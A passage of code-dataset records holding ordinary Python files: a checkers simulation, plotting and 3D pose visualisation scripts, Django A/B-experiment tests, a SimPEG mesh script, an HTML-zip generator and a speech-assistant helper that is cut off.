are left on the board...\r\n        player1_pieces = 0\r\n        player2_pieces = 0 \r\n        for x in range(8):\r\n            for y in range(8):\r\n                if board[x][y] == 'X':\r\n                    player1_pieces = player1_pieces + 1\r\n                if board[x][y] == 'K':\r\n                    player1_pieces = player1_pieces + 2\r\n                    #this is because in checkers a 'king' piece is 2 stacked regular pieces, so you essentially win back a piece\r\n                if board[x][y] == 'O':\r\n                    player2_pieces = player2_pieces + 1\r\n                if board[x][y] == '0':\r\n                    player2_pieces = player2_pieces + 2\r\n        if player2_pieces > player1_pieces:\r\n            winner = 'Player 2 wins!'\r\n        elif player2_pieces < player1_pieces:\r\n            winner = 'Player 1 wins!'\r\n        else:\r\n            winner = \"It's a tie!\"\r\n        return winner\r\n    \r\n    \r\n    ###################################################################\r\n    \r\n    player1_type = 'comp'\r\n    p1comp_level = 1\r\n    player2_type = 'comp'\r\n    p2comp_level = 2\r\n    \r\n    player1_marker = 'X'\r\n    player2_marker = 'O'\r\n    player1_marker_king = 'K'\r\n    player2_marker_king = '0'\r\n\r\n    turn = 1 \r\n    game_board = start_board()\r\n    game_over = False \r\n    \r\n    while not game_over:\r\n        if (turn % 2) != 0: #first turn is 1, which is odd \r\n            possible_moves = get_possible_moves(game_board, player1_marker, player1_marker_king)\r\n            if len(possible_moves) == 0:\r\n                game_over = True\r\n                break \r\n            if player1_type == 'human': #get the human's move\r\n                pass\r\n            if player1_type == 'comp':\r\n                xstart, ystart, xnew, ynew = get_computer_move(p1comp_level, game_board, player1_marker, player1_marker_king)\r\n                make_move(game_board, player1_marker, player1_marker_king, xstart, ystart, xnew, ynew)\r\n                capture_piece(game_board, player1_marker, player1_marker_king, xstart, ystart, xnew, ynew)\r\n                piece_becomes_king(game_board, player1_marker, player1_marker_king, xstart, ystart, xnew, ynew)\r\n            turn = turn + 1\r\n        if (turn % 2) == 0:\r\n            possible_moves = get_possible_moves(game_board, player2_marker, player2_marker_king)\r\n            if len(possible_moves) == 0:\r\n                game_over = True\r\n                break\r\n            if player2_type == 'human':\r\n                pass\r\n            if player2_type == 'comp': \r\n                xstart, ystart, xnew, ynew = get_computer_move(p2comp_level, game_board, player2_marker, player2_marker_king)\r\n                make_move(game_board, player2_marker, player2_marker_king, xstart, ystart, xnew, ynew)\r\n                capture_piece(game_board, player2_marker, player2_marker_king, xstart, ystart, xnew, ynew)\r\n                piece_becomes_king(game_board, player2_marker, player2_marker_king, xstart, ystart, xnew, ynew)\r\n            turn = turn + 1 \r\n    winner = get_winner(game_board)\r\n    return winner\r\n\r\np1wins = 0\r\np2wins = 0\r\ntie = 0\r\n\r\nfor i in range(100):\r\n    winner = main()\r\n    gamenum = i + 1\r\n    if winner == 'Player 1 wins!':\r\n        p1wins = p1wins + 1\r\n    elif winner == 'Player 2 wins!': #elif is required here: with two separate ifs, every Player 1 win also fell through to the else branch and was counted as a tie\r\n        p2wins = p2wins + 1\r\n    else:\r\n        tie = tie + 1\r\n\r\nprint(gamenum, 'games. p1 won', p1wins, 'p2 won', p2wins, 'ties', tie)\r\n","sub_path":"simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":18410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121513791","text":"import matplotlib.pyplot as plt\n\nf = open(\"../../../stats.txt\")\nfrequency = []\nprobability = []\n\n# get just the word frequencies\nfor line in f:\n    data = line.split(\" \")\n\n    # ignore the last character (\\n)\n    frequency.append(int(data[1]))\n    probability.append(float(data[2][:-1]))\n\nf.close()\n\n# y = f(x) -> prob = f(freq); '---' is not a valid matplotlib linestyle, '--' is the dashed style\nplt.plot(frequency, probability, linestyle='--', marker='o', color='r')\n# plt.scatter(frequency, probability)\nplt.gca().invert_xaxis()\nplt.ylabel(\"Probability\")\nplt.xlabel(\"Frequency\")\n\n# plt.show()\nplt.savefig('graph.png', dpi=200)\n","sub_path":"src/week1/plotting/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441340484","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport os\nimport cv2\nimport random\nimport os.path as osp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import Axes3D\nplt.switch_backend('agg')\nplt.ioff()\n\nimport h5py\nfrom tqdm import trange\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--seq_num', type=int, default=1, help='Specify the number of sequences to render')\nparser.add_argument('--save_dir', type=str, default=\"../vis/\", help='Specify the directory to save the visualization')\nparser.add_argument('--in_filename', type=str, default=\"../data/h36m_valid_pred_3d.h5\", help=\"Specify the dataset to load from\")\nargs = 
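# A minimal alternative to the tallying loop below, assuming the surrounding
# main() from this script: collections.Counter counts each outcome string
# directly, which sidesteps the if/elif bookkeeping. 'run_series_sketch' and
# 'n_games' are illustrative names, not part of the original.
from collections import Counter

def run_series_sketch(n_games=10):
    # e.g. Counter({'Player 2 wins!': 6, 'Player 1 wins!': 3, "It's a tie!": 1})
    return Counter(main() for _ in range(n_games))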
parser.parse_args()\nseq_num = args.seq_num \nsave_dir = args.save_dir\nin_filename = args.in_filename\nos.makedirs(save_dir, exist_ok=True)\n\nv3d_to_ours = [3, 2, 1, 4, 5, 6, 16, 15, 14, 11, 12, 13, 8, 0, 7, 9, 10]\npairs = [(0, 1), (1, 2), (2, 13), (3, 13), (3, 4), (4, 5), (6, 7), (7, 8), (8, 12), (9, 10),(9, 12), (10, 11),(12, 14), (12, 15), (13, 14), (15, 16)]\npairs_left = [(3, 13), (3, 4), (4, 5), (9, 10), (9, 12), (10, 11)]\npairs_right = [(0, 1), (1, 2), (2, 13), (6, 7), (7, 8), (8, 12)]\n\ncolors = {\n 'pink': np.array([197, 27, 125]), # L lower leg\n 'light_pink': np.array([233, 163, 201]), # L upper leg\n 'light_green': np.array([161, 215, 106]), # L lower arm\n 'green': np.array([77, 146, 33]), # L upper arm\n 'red': np.array([215, 48, 39]), # head\n 'light_red': np.array([252, 146, 114]), # head\n 'light_orange': np.array([252, 141, 89]), # chest\n 'purple': np.array([118, 42, 131]), # R lower leg\n 'light_purple': np.array([175, 141, 195]), # R upper\n 'light_blue': np.array([145, 191, 219]), # R lower arm\n 'blue': np.array([69, 117, 180]), # R upper arm\n 'gray': np.array([130, 130, 130]), #\n 'white': np.array([255, 255, 255]), #\n}\njcolors = [\n 'light_pink', 'light_pink', 'light_pink', 'pink', 'pink', 'pink',\n 'light_blue', 'light_blue', 'light_blue', 'blue', 'blue', 'blue',\n 'purple', 'purple', 'red', 'green', 'green', 'white', 'white'\n]\necolors = {\n 0: 'light_pink',\n 1: 'light_pink',\n 2: 'light_pink',\n 3: 'pink',\n 4: 'pink',\n 5: 'pink',\n 6: 'light_blue',\n 7: 'light_blue',\n 8: 'light_blue',\n 9: 'blue',\n 10: 'blue',\n 11: 'blue',\n 12: 'purple',\n 13: 'light_green',\n 14: 'light_green',\n 15: 'purple'\n}\n\nroot = \"/yzbdata/MeshTrack/Data/HMR/Human/Subject/\"\nimage_root = osp.join(root, \"datapre_all\")\n\nin_filename = \"../data/h36m_valid_pred_3d4118.h5\"\nin_filename_ssadv = \"../data/h36m_valid_pred_3dssadv.h5\"\n\nprint(\"Read from\", in_filename)\nf = h5py.File(in_filename, \"r\")\nimagenames = [name.decode() for name in f['imagename'][:]]\n# 2d joints in the order of v3d convention\n# poses2d = np.array(f['joint_2d_gt'])[:, v3d_to_ours]\nposes2d = np.array(f['joint_2d_gt'])\nposes3d = np.array(f['joint_3d_pre'])\nposes3d_gt = np.array(f['joint_3d_gt'])\nposes3d_gt = poses3d_gt - poses3d_gt[:, 13:14]\nf.close()\n\nf = h5py.File(in_filename_ssadv, \"r\")\nposes3d_ssadv = np.array(f['joint_3d_pre'])\nf.close()\n\nt = trange(0, len(imagenames))\nprocessed_video_names = []\n\ndef plot_skeleton_2d(all_frames, joints_2d): \n out_frames = []\n radius = max(4, (np.mean(all_frames[0].shape[:2]) * 0.01).astype(int))\n for idx in range(len(all_frames)): \n for pair in pairs: \n i, j = pair \n pt1, pt2 = joints_2d[idx, i], joints_2d[idx, j] \n x11, y11 = pt1 \n x22, y22 = pt2 \n if pair in pairs_left: \n color = (205, 0, 0)\n elif pair in pairs_right: \n color = (0, 205, 0)\n else: \n color = (0, 165, 255)\n cv2.line(all_frames[idx], (int(x11), int(y11)), (int(x22), int(y22)), color, radius-2)\n \ndef get_xxyys(names): \n xxyys = []\n # should be subject, action, camera\n splits = names[0].split('/')\n video_name = '/'.join(splits[:-1])\n part_label_path = osp.join(root, splits[0], 'MySegmentsMat', 'PartLabels',\n splits[1] + (\"cam\" + splits[2]).replace('cam0', '.54138969').replace('cam2','.58860488').replace('cam1', '.55011271').replace('cam3', '.60457274') + \".mat\")\n f = h5py.File(part_label_path, \"r\")\n for idx, name in enumerate(names): \n partmask = f[f['Feat'][idx*30, 0]][()].T \n yp, xp = np.where(partmask != 0)\n xmin, xmax = np.min(xp), 
np.max(xp) + 1 \n ymin, ymax = np.min(yp), np.max(yp) + 1 \n xxyys.append((xmin, xmax, ymin, ymax))\n f.close()\n return xxyys\n\ndef crop_image(all_frames, xxyys, scale_factor=0.25): \n out_frames = []\n for frame, xxyy in zip(all_frames, xxyys): \n h, w = frame.shape[:2]\n xmin, xmax, ymin, ymax = xxyy \n xc, yc = (xmin + xmax) / 2, (ymin + ymax) / 2\n l = max(xmax - xmin, ymax - ymin)\n xmin, xmax = max(0, xc - l/2), min(w, xc + l / 2)\n ymin, ymax = max(0, yc - l/2), min(h, yc + l / 2)\n xmin, xmax = int(xmin), int(xmax)\n ymin, ymax = int(ymin), int(ymax)\n frame = frame[ymin:ymax, xmin:xmax, :].copy()\n frame = cv2.resize(frame, (int(scale_factor * w), int(scale_factor * h)))\n frame = frame[::-1, :, ::-1] / 255\n out_frames.append(frame)\n return out_frames\n\nfor imageid in t:\n name = imagenames[imageid]\n splits = name.split('/')\n video_name = '/'.join(splits[:3])\n if len(processed_video_names) == seq_num: \n print(\"Finished! Rendered {} sequences, saved to {}\".format(seq_num, save_dir))\n break\n if video_name in processed_video_names:\n continue \n else:\n processed_video_names.append(video_name)\n print(video_name)\n recs = [(idx, name) for idx, name in enumerate(imagenames) if video_name in name]\n # downsample \n recs = recs[::30]\n # cand_list = [x*5 for x in [440, 565, 770]]\n # cand_list = [200, 250, 300, 350, 400, 450, 500, 520, 550, 590, 620, 660, 700, 740, 770, 800, 830, 845]\n # recs = list(filter(lambda x: x[0] in cand_list, recs))\n # recs = list(filter(lambda x: x[0] in [65*5, 100*5, 905*5, 1160*5], recs))\n recs = sorted(recs, key=lambda x: int(x[1].split('/')[-1]))\n names_in_video = [rec[1] for rec in recs]\n indices_in_video = [rec[0] for rec in recs]\n path_format = osp.join(image_root, splits[0], splits[1].replace(' ', '_'), \"cam\" + splits[2], \"{:06d}.jpg\")\n poses3d_in_video = poses3d[indices_in_video]\n poses2d_in_video = poses2d[indices_in_video]\n poses3d_ssadv_in_video = poses3d_ssadv[indices_in_video]\n poses3d_gt_in_video = poses3d_gt[indices_in_video]\n all_frames = [cv2.imread(path_format.format(int(name.split('/')[-1])+1)) for name in names_in_video]\n print(\"Ploting 2d skeleton...\")\n plot_skeleton_2d(all_frames, poses2d_in_video)\n # scale_factor = 0.25\n # all_frames = [cv2.resize(frame, (int(scale_factor * frame.shape[1]), int(scale_factor * frame.shape[0])))[::-1, :, ::-1] / 255 for frame in all_frames]\n print(\"Getting bounding boxes...\")\n xxyys = get_xxyys(names_in_video)\n print(\"Cropping images...\")\n all_frames = crop_image(all_frames, xxyys, scale_factor=0.2)\n print(\"Generating gifs...\")\n\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111, projection='3d')\n ax.view_init(elev=10., azim=45.)\n lines_3d, lines_3d_gt = [], []\n lines_3d_ssadv = []\n radius = 0.75 \n initialized = False\n num_render = len(names_in_video)\n print(num_render, \" frames to plot\")\n\n def update_video(frame_idx):\n global initialized, lines_3d, lines_3d_gt, lines_3d_ssadv\n print(\"{}/{} \".format(frame_idx, num_render), end='\\r')\n pose2d = poses2d_in_video[frame_idx]\n pose3d = poses3d_in_video[frame_idx]\n pose3d_ssadv = poses3d_ssadv_in_video[frame_idx]\n pose3d_gt = poses3d_gt_in_video[frame_idx]\n if not initialized:\n for idx, pair in enumerate(pairs):\n i, j = pair\n if pair in pairs_left: \n color = \"blue\"\n elif pair in pairs_right: \n color = \"green\"\n else: \n color = \"darkorange\"\n # pt1, pt2 = pose3d[i], pose3d[j]\n # x11, y11, z11 = pt1\n # x22, y22, z22 = pt2\n # lines_3d.append(ax.plot([z11, z22], [x11, 
x22], [-y11, -y22], c='red', linewidth=3, label=\"pre\"))\n pt1, pt2 = pose3d_gt[i], pose3d_gt[j]\n x11, y11, z11 = pt1 \n x22, y22, z22 = pt2 \n lines_3d_gt.append(ax.plot([z11, z22], [x11, x22], [-y11, -y22], c=color, linewidth=3, label=\"gt\"))\n # pt1, pt2 = pose3d_ssadv[i], pose3d_ssadv[j]\n # x11, y11, z11 = pt1 \n # x22, y22, z22 = pt2\n # lines_3d_ssadv.append(ax.plot([z11, z22], [x11, x22], [-y11, -y22], c=\"red\", linewidth=3, label=\"ssadv\"))\n initialized = True\n else:\n for idx, pair in enumerate(pairs):\n i, j = pair\n # pt1, pt2 = pose3d[i], pose3d[j]\n # x11, y11, z11 = pt1\n # x22, y22, z22 = pt2\n # lines_3d[idx][0].set_xdata([z11, z22])\n # lines_3d[idx][0].set_ydata([x11, x22])\n # lines_3d[idx][0].set_3d_properties([-y11, -y22])\n pt1, pt2 = pose3d_gt[i], pose3d_gt[j]\n x11, y11, z11 = pt1\n x22, y22, z22 = pt2\n lines_3d_gt[idx][0].set_xdata([z11, z22])\n lines_3d_gt[idx][0].set_ydata([x11, x22])\n lines_3d_gt[idx][0].set_3d_properties([-y11, -y22])\n # pt1, pt2 = pose3d_ssadv[i], pose3d_ssadv[j]\n # x11, y11, z11 = pt1\n # x22, y22, z22 = pt2\n # lines_3d_ssadv[idx][0].set_xdata([z11, z22])\n # lines_3d_ssadv[idx][0].set_ydata([x11, x22])\n # lines_3d_ssadv[idx][0].set_3d_properties([-y11, -y22])\n\n xroot, yroot, zroot = pose3d_gt[13, 0], -pose3d_gt[13, 1], pose3d_gt[13, 2]\n ax.set_ylim3d([-radius+xroot, radius+xroot])\n ax.set_zlim3d([-radius+yroot, radius+yroot])\n ax.set_xlim3d([-2.5 * radius+zroot, radius+zroot])\n ax.get_xaxis().set_ticklabels([])\n ax.get_yaxis().set_ticklabels([])\n ax.set_zticklabels([])\n\n white = (1.0, 1.0, 1.0, 0.0)\n ax.w_xaxis.set_pane_color(white)\n ax.w_yaxis.set_pane_color(white)\n\n ax.w_xaxis.line.set_color(white)\n ax.w_yaxis.line.set_color(white)\n ax.w_zaxis.line.set_color(white)\n\n r = 0.95\n # radius = max(4, (np.mean(all_frames[0].shape[:2]) * 0.01).astype(int))\n xx = np.linspace(-r * radius + xroot, r * radius + xroot, all_frames[frame_idx].shape[1])\n yy = np.linspace(-r * radius + yroot, r * radius + yroot, all_frames[frame_idx].shape[0])\n xx, yy = np.meshgrid(xx, yy)\n zz = np.ones_like(xx) * (-3.2* radius + zroot)\n ax.set_xlabel('Z', fontsize=13)\n ax.set_ylabel(\"X\", fontsize=13)\n ax.set_zlabel(\"Y\", fontsize=13)\n ax.plot_surface(zz, xx, yy, rstride=1, cstride=1, facecolors=all_frames[frame_idx], shade=False)\n plt.savefig(osp.join(save_dir, f\"{video_name.replace('/', '_')}_{frame_idx}.png\"))\n\n for idx in range(len(names_in_video)): \n update_video(idx)\n ani = animation.FuncAnimation(fig, update_video, range(len(names_in_video)), interval=20)\n save_name = name.replace('/', '_')\n ani.save(osp.join(save_dir, f\"{save_name}.gif\"), writer='imagemagick', fps=20)\n t.set_postfix(index=int(imageid))\n","sub_path":"body/human_pose/ambiguity_aware/scripts/plot1.py","file_name":"plot1.py","file_ext":"py","file_size_in_byte":11678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"412681508","text":"from django.http import HttpResponse\nfrom django.test import TestCase, RequestFactory\nfrom django.contrib.sessions.backends.db import SessionStore as DatabaseSession\n\nfrom unittest import TestSuite\n\nfrom experiments import conf\nfrom experiments.experiment_counters import ExperimentCounter\nfrom experiments.middleware import ExperimentsRetentionMiddleware\nfrom experiments.signal_handlers import transfer_enrollments_to_user\nfrom experiments.utils import DummyUser, SessionUser, AuthenticatedUser, participant\nfrom experiments.models import Experiment, 
ENABLED_STATE, Enrollment\n\nfrom django.contrib.auth import get_user_model\n\nTEST_ALTERNATIVE = 'blue'\nEXPERIMENT_NAME = 'backgroundcolor'\n\n\nclass WebUserIncorporateTestCase(object):\n def __init__(self, *args, **kwargs):\n super(WebUserIncorporateTestCase, self).__init__(*args, **kwargs)\n self.experiment_counter = ExperimentCounter()\n\n def test_can_incorporate(self):\n self.incorporating.incorporate(self.incorporated)\n\n def test_incorporates_enrollment_from_other(self):\n if not self._has_data():\n return\n\n try:\n experiment = Experiment.objects.create(name=EXPERIMENT_NAME, state=ENABLED_STATE)\n self.incorporated.set_alternative(EXPERIMENT_NAME, TEST_ALTERNATIVE)\n self.incorporating.incorporate(self.incorporated)\n self.assertEqual(self.incorporating.get_alternative(EXPERIMENT_NAME), TEST_ALTERNATIVE)\n finally:\n self.experiment_counter.delete(experiment)\n\n def _has_data(self):\n return not isinstance(self.incorporated, DummyUser) and not isinstance(self.incorporating, DummyUser)\n\n\ndef dummy(incorporating):\n return DummyUser()\n\n\ndef anonymous(incorporating):\n return SessionUser(session=DatabaseSession())\n\n\ndef authenticated(incorporating):\n User = get_user_model()\n return AuthenticatedUser(user=User.objects.create(username=['incorporating_user', 'incorporated_user'][incorporating]))\n\n\nclass Dummy2DummyIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Dummy2DummyIncorporateTestCase, self).setUp()\n self.incorporating = dummy(True)\n self.incorporated = dummy(False)\n\n\nclass Dummy2AnonymousIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Dummy2AnonymousIncorporateTestCase, self).setUp()\n self.incorporating = dummy(True)\n self.incorporated = anonymous(False)\n\n\nclass Dummy2AuthenticatedIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Dummy2AuthenticatedIncorporateTestCase, self).setUp()\n self.incorporating = dummy(True)\n self.incorporated = authenticated(False)\n\n\nclass Anonymous2DummyIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Anonymous2DummyIncorporateTestCase, self).setUp()\n self.incorporating = anonymous(True)\n self.incorporated = dummy(False)\n\n\nclass Anonymous2AnonymousIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Anonymous2AnonymousIncorporateTestCase, self).setUp()\n self.incorporating = anonymous(True)\n self.incorporated = anonymous(False)\n\n\nclass Anonymous2AuthenticatedIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Anonymous2AuthenticatedIncorporateTestCase, self).setUp()\n self.incorporating = anonymous(True)\n self.incorporated = authenticated(False)\n\n\nclass Authenticated2DummyIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Authenticated2DummyIncorporateTestCase, self).setUp()\n self.incorporating = authenticated(True)\n self.incorporated = dummy(False)\n\n\nclass Authenticated2AnonymousIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Authenticated2AnonymousIncorporateTestCase, self).setUp()\n self.incorporating = authenticated(True)\n self.incorporated = anonymous(False)\n\n\nclass Authenticated2AuthenticatedIncorporateTestCase(WebUserIncorporateTestCase, TestCase):\n\n def setUp(self):\n super(Authenticated2AuthenticatedIncorporateTestCase, self).setUp()\n self.incorporating = authenticated(True)\n 
self.incorporated = authenticated(False)\n\n\nclass IncorporateTestCase(TestCase):\n def setUp(self):\n self.experiment = Experiment.objects.create(name=EXPERIMENT_NAME, state=ENABLED_STATE)\n self.experiment_counter = ExperimentCounter()\n\n User = get_user_model()\n self.user = User.objects.create(username='incorporate_user')\n self.user.is_confirmed_human = True\n\n request_factory = RequestFactory()\n self.request = request_factory.get('/')\n self.request.session = DatabaseSession()\n participant(self.request).confirm_human()\n\n def tearDown(self):\n self.experiment_counter.delete(self.experiment)\n\n def _login(self):\n self.request.user = self.user\n transfer_enrollments_to_user(None, self.request, self.user)\n\n def test_visit_incorporate(self):\n alternative = participant(self.request).enroll(self.experiment.name, ['alternative'])\n\n ExperimentsRetentionMiddleware().process_response(self.request, HttpResponse())\n\n self.assertEqual(\n dict(self.experiment_counter.participant_goal_frequencies(self.experiment,\n alternative,\n participant(self.request)._participant_identifier()))[conf.VISIT_NOT_PRESENT_COUNT_GOAL],\n 1\n )\n\n self.assertFalse(Enrollment.objects.all().exists())\n self._login()\n\n self.assertTrue(Enrollment.objects.all().exists())\n self.assertIsNotNone(Enrollment.objects.all()[0].last_seen)\n self.assertEqual(\n dict(self.experiment_counter.participant_goal_frequencies(self.experiment,\n alternative,\n participant(self.request)._participant_identifier()))[conf.VISIT_NOT_PRESENT_COUNT_GOAL],\n 1\n )\n self.assertEqual(self.experiment_counter.goal_count(self.experiment, alternative, conf.VISIT_NOT_PRESENT_COUNT_GOAL), 1)\n self.assertEqual(self.experiment_counter.participant_count(self.experiment, alternative), 1)\n\n","sub_path":"experiments/tests/test_webuser_incorporate.py","file_name":"test_webuser_incorporate.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"272251381","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 8 17:43:22 2019\n\n@author: ellen\n\"\"\"\n\nfrom SimPEG import Mesh, Utils\nfrom discretize.utils import mkvc, refine_tree_xyz\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nstyle_list = ['default', 'classic'] + sorted(\n style for style in plt.style.available if style != 'classic')\n\nplt.close('all')\n\n# sphinx_gallery_thumbnail_number = 4\n\n###############################################\n# Basic Example\n# -------------\n#\n# Here we demonstrate the basic two step process for creating a 2D tree mesh\n# (QuadTree mesh). The region of highest discretization if defined within a\n# rectangular box. 
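# A condensed, runnable sketch of the two-step pattern this script follows,
# using only calls that appear in this file (Mesh.TreeMesh, mkvc,
# refine_tree_xyz with method='box', and finalize); the sizes and the helper
# name _quadtree_sketch are illustrative, not the script's own values.
def _quadtree_sketch():
    h = 40 * np.ones(128)                      # base cell width x cell count
    mesh = Mesh.TreeMesh([h, h])               # step 1: define the base mesh
    xp, yp = np.meshgrid([0., 5120.], [1000., 999.])
    xy = np.c_[mkvc(xp), mkvc(yp)]             # corners of the refinement box
    mesh = refine_tree_xyz(mesh, xy, octree_levels=[1, 1],
                           method='box', finalize=True)  # step 2: refine and finalize
    return mesh
# 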
We use the keyword argument *octree_levels* to define the\n# rate of cell width increase outside the box.\n#\n\n# cell size: dh per cell, nbc cells per axis (nbc a power of 2)\n# horizontal dimensions\ndh = 40  # minimum cell width (base mesh cell width)\n\n# number of base mesh cells per axis (power of 2)\nnbcx = 128  # number of base mesh cells in x\nnbcy = 128\nnbcz = 128\n# Define base mesh (domain and finest discretization)\nhx = dh*np.ones(nbcx)\nhy = dh*np.ones(nbcy)\nhz = dh*np.ones(nbcz)\n\nM = Mesh.TreeMesh([hx,hy])\n\n# define the layer\n\nxp, yp = np.meshgrid( [0., 5120.], [1000., 999.]) #layer\nxy = np.c_[mkvc(xp), mkvc(yp)] # mkvc creates vectors\n\n# Discretize to finest cell size within rectangular box\nM = refine_tree_xyz(\n    M, xy, octree_levels=[1, 1], method='box', finalize=False\n    )\n\n\n\n# Define the target object\nxp, yp = np.meshgrid( [2400., 2600.], [2000, 1999.]) #goal\nxy = np.c_[mkvc(xp), mkvc(yp)] # mkvc creates vectors\n\n# Discretize to finest cell size around the object (note: method='radial' here, not 'box')\nM = refine_tree_xyz(\n    M, xy, octree_levels=[4, 4], method='radial', finalize=False\n    )\n\n\n#=========================================\n# Creating one more discretization area\n#=========================================\n\nM.finalize() # Must finalize tree mesh before use\nM.plotGrid(showIt=True)\nax = plt.gca()\nax.invert_yaxis()\nplt.show()\n\nnC = M.nC\nprint(nC)\n#print(\"Here!\")\n#mesh.plotGrid(showIt=True)","sub_path":"temp/malha2D.py","file_name":"malha2D.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424300456","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport json\nimport os\nimport uuid\n\nimport random\nfrom jinja2 import Environment, FileSystemLoader\nfrom random_generator_libs import specific_generator\nimport shutil\n\nx=sys.argv[1]\ndata=json.loads(x)\n\nif not \"filename\" in data:\n\texit()\n\nif not \"templates\" in data:\n\texit()\n\nif data['templates'] == None:\n\texit()\n\nbase_directory_path = os.path.dirname(os.path.abspath(__file__))\ntemplate_directory_path = \"{}/random_generator_libs/template\".format(base_directory_path)\nzip_directory_path = base_directory_path.replace('scripts', 'storage')\n\nenv = Environment(loader=FileSystemLoader(template_directory_path, encoding='utf8'))\ntpl = env.get_template('outline.tpl.html')\n\nu4 = data['filename'] #str(uuid.uuid4()) \nwork_dir_path = '{}/{}'.format(base_directory_path, u4)\nif os.path.exists(work_dir_path):\n\tshutil.rmtree(work_dir_path)\n\nshutil.copytree('{}/htmls'.format(base_directory_path), work_dir_path)\n\ntext = \"\"\nfor template in data['templates']:\n\ttext += specific_generator.generate_html(template)\n\nhtml = tpl.render({'text': text})\n\nwith open('{}/index.html'.format(work_dir_path), mode='w', encoding='utf-8') as f:\n\tf.write(html)\n\nshutil.make_archive('{}/app/public/{}'.format(zip_directory_path, u4), 'zip', root_dir=work_dir_path)\nshutil.rmtree(work_dir_path)\nprint(u4)\n","sub_path":"scripts/run3.py","file_name":"run3.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
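# A minimal sketch of the render-and-zip flow run3.py implements above,
# limited to calls that appear in that script (Environment, FileSystemLoader,
# get_template, render, shutil.make_archive); the paths, the context dict and
# the template name 'outline.tpl.html' are illustrative assumptions.
import shutil
from jinja2 import Environment, FileSystemLoader

def render_and_zip_sketch(template_dir, out_dir, context):
    env = Environment(loader=FileSystemLoader(template_dir, encoding='utf8'))
    html = env.get_template('outline.tpl.html').render(context)
    with open('{}/index.html'.format(out_dir), mode='w', encoding='utf-8') as f:
        f.write(html)
    # pack the rendered directory into <out_dir>.zip
    shutil.make_archive(out_dir, 'zip', root_dir=out_dir)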
+{"seq_id":"160570034","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pyttsx, time, pyaudio, wave, sys\nfrom definitions import *\nimport speech_recognition as sr\n\n\nr = sr.Recognizer()\n\ndef log(d):\n\tt = '[' + time.strftime(\"%Y-%m-%d %H:%M:%S\") + '] :: '\n\tfileLocation = \"C:\\\\wamp\\\\www\\\\Piyu-UI\\\\interface.txt\"\n\t_file = open(fileLocation, \"a\")\n\t_file.write(t + d + \"\\n\")\n\t_file.close()\n\tprint(t + d)\n\ndef say(word):\n\tengine = pyttsx.init()\n\tengine.setProperty('rate', RATE)\n\tengine.say(word)\n\tengine.runAndWait()\n\n\ndef speak(a_name, lang='en'):\n\t#lang defaults to English so one-argument callers like speak(VOICE.repeat) keep working\n\tCHUNK = 1024\n\tif(lang=='ta'):\n\t\tBASE_DIR = 'voices\\\\tamil'\n\telse:\n\t\tBASE_DIR = 'voices'\n\taudioFileName = BASE_DIR + '\\\\' + a_name + WAV\n\ttry:\n\t\twf = wave.open(audioFileName, 'rb')\n\texcept IOError: #wave.open raises IOError on a missing file under Python 2; FileNotFoundError does not exist there\n\t\twf = wave.open('voices\\\\beep' + WAV, 'rb')\n\tp = pyaudio.PyAudio()\n\t_log = '[[Audio]]==>' + a_name + WAV + '\\t\\t'\n\tprint('PIYU CORE v.1.0 - ' + _log)\n\tlog(_log)\n\tstream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n\t                channels=wf.getnchannels(),\n\t                rate=wf.getframerate(),\n\t                output=True)\n\tdata = wf.readframes(CHUNK)\n\n\twhile data != '':\n\t\tstream.write(data)\n\t\tdata = wf.readframes(CHUNK)\n\n\tstream.stop_stream()\n\tstream.close()\n\tp.terminate()\n\n\ndef action(source):\n\taudio = r.listen(source)\n\ttry:\n\t\ttxtData = r.recognize(audio) #recognize once and reuse the result\n\t\tprint(txtData)\n\t\t#mapText(txtData)\n\texcept (KeyboardInterrupt, SystemExit):\n\t\traise\n\texcept LookupError:\n\t\tspeak(VOICE.repeat)\n\t\tsleepTime = .1 #getSleepTime() was never defined anywhere, so pause for a fixed interval\n\t\tprint(\"Sleeping....\")\n\t\tprint(sleepTime)\n\t\ttime.sleep(sleepTime)\n\t\tprint(\"Wokeup...\")\n\n\ndef listen():\t\n\twith sr.Microphone() as source: # use the default microphone as the audio source\n\t\twhile(1):\n\t\t\tprint(\"Listening....\")\n\t\t\taction(source) # listen for the first phrase and extract it into audio data\n\n\ndef mapText(data):\n\ttxts = TXT()\n\ttxts = [txts for txts in dir(txts) if not txts.startswith('__')]\n\tvar1 = TXT()\n\tfor txt in txts:\n\t\t#print(var1.__getitem__(txt))\n\t\tif(data in var1.__getitem__(txt)):\n\t\t\treturn str(txt)\n\treturn 